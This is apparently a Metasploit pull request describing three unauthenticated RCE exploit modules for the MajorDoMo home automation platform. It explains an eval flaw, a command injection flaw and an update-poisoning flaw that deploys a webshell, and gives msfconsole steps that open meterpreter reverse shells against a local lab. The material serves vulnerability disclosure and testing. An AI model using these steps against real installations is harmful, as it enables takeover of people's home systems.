Add three MajorDoMo unauthenticated RCE modules

[Chocapikk]

Hello Metasploit Team,

This PR adds three exploit modules for MajorDoMo, an open-source home automation platform. All three vulnerabilities are unauthenticated and affect every version up to and including the latest release. The fix is tracked in sergejey/majordomo#1177.

Blog post with full technical details: https://chocapikk.com/posts/2026/majordomo-revisited/

Modules

1. exploit/multi/http/majordomo_console_eval_rce (CVE-2026-27174)

Unauthenticated PHP eval via the admin console. A missing exit after redirect("/") in panel.class.php allows execution to continue into the AJAX handler, which passes user input directly to eval() via evalConsole(). Single GET request to /admin.php.

2. exploit/multi/http/majordomo_cmd_injection_rce (CVE-2026-27175)

Command injection via rc/index.php. The param parameter is interpolated into double quotes without escapeshellarg() and queued into the safe_execs table via safe_exec(). The cycle_execs.php worker is web-accessible without authentication - the module starts it, waits for it to enter its polling loop, then injects the payload. The worker picks it up within one second and passes it to exec().

3. exploit/multi/http/majordomo_supply_chain_rce (CVE-2026-27180)

Update poisoning via the saverestore module. Two unauthenticated GET requests: the first poisons MASTER_UPDATE_URL to point to an attacker-controlled server, the second triggers autoUpdateSystem() which fetches a tarball and deploys it to the webroot via copyTree(). The module serves a fake Atom feed and a tarball containing a PHP webshell.

Targets

• Modules 1 and 3 support PHP In-Memory, Unix/Linux CMD, and Windows CMD targets
• Module 2 supports Unix/Linux CMD and Windows CMD targets (OS command injection, not PHP eval)

Verification

Docker Lab Setup (shared by all three modules)

mkdir majordomo-lab && cd majordomo-lab
git clone https://github.com/sergejey/majordomo.git src
cd src && git checkout 41086aaa && cd ..

See the module documentation for full Dockerfile, entrypoint.sh, and docker-compose.yml. MajorDoMo will be available at http://127.0.0.1:8899.

Module 1: Console Eval RCE

• Start msfconsole
• use exploit/multi/http/majordomo_console_eval_rce
• set RHOSTS 127.0.0.1
• set RPORT 8899
• set PAYLOAD php/meterpreter/reverse_tcp
• set LHOST 172.17.0.1
• check - Verify it returns Vulnerable
• run - Verify a Meterpreter session opens as www-data

Module 2: Command Injection RCE

• use exploit/multi/http/majordomo_cmd_injection_rce
• set RHOSTS 127.0.0.1
• set RPORT 8899
• set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
• set LHOST 172.17.0.1
• set FETCH_SRVHOST 172.17.0.1
• check - Verify it returns Vulnerable
• run - Verify a Meterpreter session opens as www-data

Module 3: Supply Chain RCE

• use exploit/multi/http/majordomo_supply_chain_rce
• set RHOSTS 127.0.0.1
• set RPORT 8899
• set PAYLOAD php/meterpreter/reverse_tcp
• set LHOST 172.17.0.1
• set SRVHOST 172.17.0.1
• check - Verify it returns Vulnerable
• run - Verify a Meterpreter session opens as www-data

Documentation

• Document majordomo_console_eval_rce.md
• Document majordomo_cmd_injection_rce.md
• Document majordomo_supply_chain_rce.md